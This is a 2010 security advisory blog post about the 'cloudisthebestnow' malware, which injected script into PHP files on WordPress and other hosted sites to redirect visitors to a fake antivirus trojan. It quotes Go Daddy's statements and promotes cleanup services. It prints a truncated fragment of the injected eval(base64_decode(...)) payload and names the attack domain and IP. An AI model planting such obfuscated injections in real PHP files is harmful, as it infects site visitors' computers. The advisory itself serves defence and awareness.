On June 8, 2010 at approximately 3pm EST self-hosted WordPress blogs, along with other PHP based websites started getting attacked with cloudisthebestnow malware. This is a server-side hacker attack. We have confirmed reports of hacked websites hosted at Go Daddy again. However, other hosting companies may also be affected.
The “cloudisthebestnow” hack attack is dangerous malware! It injects malicious script into all .php files that redirects website visitors’ to a “fake AV” program at http://cloudisthebestnow[dot]com/kp.php.
Once a website visitor is redirected, a program (known as a trojan) tries to install itself on their computer. This program executes specific actions that could potentially give the attacker complete control over an infected PC. If your website visitor has an unprotected computer, the trojan could survive on their system and open up a backdoor.
This malware tries to manipulate users into purchasing various rogue anti-spyware/virus applications, which may look like official advertisements. At this time, it is unknown what this virus may also do to an infected computer.
< ?php /**/ eval(base64_decode(“aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNz
This encrypted code writes the following script to all infected pages:
This malware attack is the same person(s) as previous attacks, such as the losotrana malware attack. They share the same IP address of 126.96.36.199.
Go Daddy reached out to us to inform our community about this latest hacker attack. They have released the following statement:
***Compromised Websites Update 6/8/10***
An attack impacting several hundred accounts happened this afternoon. Go Daddy is working with other top hosting providers and security experts to gather information to stop the criminals initiating these exploits.
We have contacted the malware site registrar to remove the offending domain from the Internet, in order to block the attack.
As part of our investigation, Go Daddy has launched a fact-finding tool to collect information about your experience. If you suspect your site was impacted, please fill out our security submission form, located here – http://www.godaddy.com/securityissue.
Manager of Information Security Operations
Please check your website now and remove the malware before your site visitors get infected or your site gets blacklisted by search engines! Also, be sure you are running the latest anti-virus program on your own computer, such at *AVG, *MalwareBytes, etc. And get your site on automatic Web Integrity Monitoring at *Sucuri.net for only $7.99/month.
If you need help or don’t know how to fix your hacked WordPress website, we offer malware removal and restoration services.
We will continue to investigate this hacker attack and provide any new information on this post as it becomes available.
We need your help….
This new cloudisthebestnow[dot]com/kp.php malware was just discovered June 8, 2010. Please help spread awareness and come together as a community. Be sure to Tweet this message and also add it to your Facebook. If you have any new information, please leave a comment below so we can all help each other.
UPDATE 6/9/2010 at 12:57pm CST:
Go Daddy has just released the following updated statement regarding this malware attack.
After the most recent malware attack (more details here), the Go Daddy Security Operations Team conducted a thorough investigation and removed the malicious code impacting our customers.
The attack injects websites with a fake-antivirus pop-up ad, claiming the visitor’s computer is infected.
If you believe your website is impacted, please fill out our Security Form. Our analysts will review and, if needed, remove the offending material from your website.
Go Daddy Chief Information Officer